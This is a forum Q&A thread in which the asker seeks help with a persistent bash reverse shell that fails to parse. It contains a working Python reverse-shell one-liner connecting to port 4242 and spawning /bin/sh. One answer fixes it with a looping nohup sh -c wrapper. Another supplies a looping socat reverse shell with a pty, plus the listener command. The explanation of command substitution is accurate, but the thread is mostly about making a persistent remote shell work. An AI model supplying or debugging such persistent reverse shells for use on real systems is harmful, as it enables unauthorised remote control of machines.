# Reverse Shell Bash Parsing

Tags: bash

I'm trying to write a small bash reverse shell but unfortunately my arguments are not parsing correctly. Specifically the nohup command is being ignored while the while loop executes as expected. Why might this be?

```
nohup "$(while :; do python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'; sleep 5; done)" >/dev/null 2>&1 &
```

Answer (score 2):

`nohup` will run the *result* of you executing the code in `$( … )`.

Let me explain...

Consider this scenario:

```
a=$(date)
```

The `date` command executes and produces output such as `Thu, 25 Jan 2024 23:20:48`<sup>*1</sup>. This text is interpolated into the line, effectively resulting in this:

```
a='Thu, 25 Jan 2024 23:20:48'
```

The assignment is then executed.

Now consider this:

```
a=$(echo hello; sleep 300; echo world)
```

The command inside the `$( … )` is executed, producing `hello {newline} world` but taking five minutes to do so. During this time the assignment has not even been started. Finally we get the equivalent of this line

```
a='hello
world'
```

and the assignment can be executed.

Now let's apply that to your situation.

> ```
> nohup "$(while :; do python3 …; done)" >/dev/null 2>&1
> ```

First of all the code inside `$( … )` is executed. Unfortunately it never ends. Were it to end, the *result* of running the code would then be passed to `nohup`. But since it never ends the `nohup` isn't executed.

Try this instead:

```
nohup sh -c "while :; do python3 'import…'; done" >/dev/null 2>&1 &
```

Note that the double quotes you use inside your Python code must be escaped as `\"` so that the outside shell (`sh`) doesn't pair them up with the starting `"`.

---

<sup>1* Actually, the `date` returns a value ending with a newline. But shells like `sh` and `bash` strip a trailing newline when interpolating, as that's (usually) what's expected</sup>

Answer (score 2):

It's a lot easier with `socat`, and also easier to read if you don't put everything on one line:

```
nohup sh -c '
  while true; do
    socat tcp:localhost:4242 exec:/bin/sh,pty,stderr,setsid,ctty
    sleep 5
  done'
```

Running:

```
socat tcp-listen:4242,reuseaddr -,raw,echo=0
```

In another terminal should show a shell prompt within 5 seconds.

Your `nohup "$(while...)"` doesn't make sense as it's meant to ask `nohup` to execute the command whose name/path is the output of that infinite loop, but only after that while loop has returned.